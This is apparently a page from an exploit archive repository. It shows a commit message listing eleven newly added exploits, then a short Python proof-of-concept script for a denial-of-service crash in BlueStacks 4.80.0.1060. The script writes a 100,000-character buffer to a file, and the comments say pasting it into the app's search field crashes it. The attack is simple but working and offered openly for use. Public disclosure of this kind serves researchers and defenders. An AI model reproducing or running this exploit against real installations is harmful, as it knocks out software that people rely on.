edfd130ad1
11 changes to exploits/shellcodes BlueStacks 4.80.0.1060 - Denial of Service (PoC) RarmaRadio 2.72.3 - 'Server' Denial of Service (PoC) RarmaRadio 2.72.3 - 'Username' Denial of Service (PoC) TapinRadio 2.11.6 - 'Address' Denial of Service (PoC) TapinRadio 2.11.6 - 'Uername' Denial of Service (PoC) Zoho ManageEngine ServiceDesk Plus < 10.5 - Improper Access Restrictions Zoho ManageEngine ServiceDesk Plus 9.3 - Cross-Site Scripting AUO Solar Data Recorder < 1.3.0 - 'addr' Cross-Site Scripting Carel pCOWeb < B1.2.1 - Cross-Site Scripting Carel pCOWeb < B1.2.1 - Credentials Disclosure Horde Webmail 5.2.22 - Multiple Vulnerabilities
21 lines
No EOL
699 B
Python
Executable file
21 lines
No EOL
699 B
Python
Executable file
# -*- coding: utf-8 -*-
|
|
# Exploit Title: BlueStacks 4.80.0.1060 - Denial of Service (PoC)
|
|
# Date: 21/05/2019
|
|
# Author: Alejandra Sánchez
|
|
# Vendor Homepage: https://www.bluestacks.com
|
|
# Software: https://www.bluestacks.com/download.html?utm_campaign=bluestacks-4-en
|
|
# Version: 4.80.0.1060
|
|
# Tested on: Windows 10
|
|
|
|
# Proof of Concept:
|
|
# 1.- Run the python script 'Bluestacks.py', it will create a new file 'exploit.txt'
|
|
# 2.- Copy the text from the generated exploit.txt file to clipboard
|
|
# 3.- Open BlueStacks
|
|
# 4.- Paste clipboard in the search field and click on the search button
|
|
# 5.- Crashed
|
|
|
|
buffer = "\x41" * 100000
|
|
|
|
f = open ("exploit.txt", "w")
|
|
f.write(buffer)
|
|
f.close() |